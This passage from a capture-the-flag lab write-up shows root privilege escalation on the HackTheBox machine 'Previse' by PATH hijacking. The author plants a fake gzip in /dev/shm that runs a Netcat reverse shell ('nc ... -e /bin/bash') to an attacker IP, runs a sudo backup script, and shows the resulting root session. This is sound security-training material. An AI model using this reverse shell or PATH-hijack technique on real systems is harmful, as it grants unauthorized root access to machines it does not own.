Path Hijacking
As discovered previously, the m4lwhere user is able to execute a command as the root user with sudo privileges
However, the sudoers configuration options doesn’t have anything set for the m4lwhere user that the user is able to pass his own environment variable to the sudo command
m4lwhere@previse:~$ export PATH=/dev/shm:$PATHI can just append an arbitrary path to the existing $PATH variable; /dev/shm
m4lwhere@previse:~$ echo $PATH
/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binNow that the $PATH variable has been updated, the system will check for those directories in the order when something is executed
m4lwhere@previse:~$ echo 'nc 10.10.14.7 1234 -e /bin/bash' > /dev/shm/gzip ; chmod 777 /dev/shm/gzipThen I can create a fake, gzip, that contains a reverse shell command to the Netcat listener on Kali
m4lwhere@previse:~$ sudo /opt/scripts/access_backup.shExecuting the sudo command
┌──(kali㉿kali)-[~/archive/htb/labs/previse]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.104] 49556
whoami
root
hostname
previse
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.104 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:3246 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:3246 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:32:46 txqueuelen 1000 (Ethernet)
RX packets 1949341 bytes 242782351 (242.7 MB)
RX errors 0 dropped 31 overruns 0 frame 0
TX packets 1618257 bytes 805823597 (805.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 18046 bytes 1508751 (1.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18046 bytes 1508751 (1.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise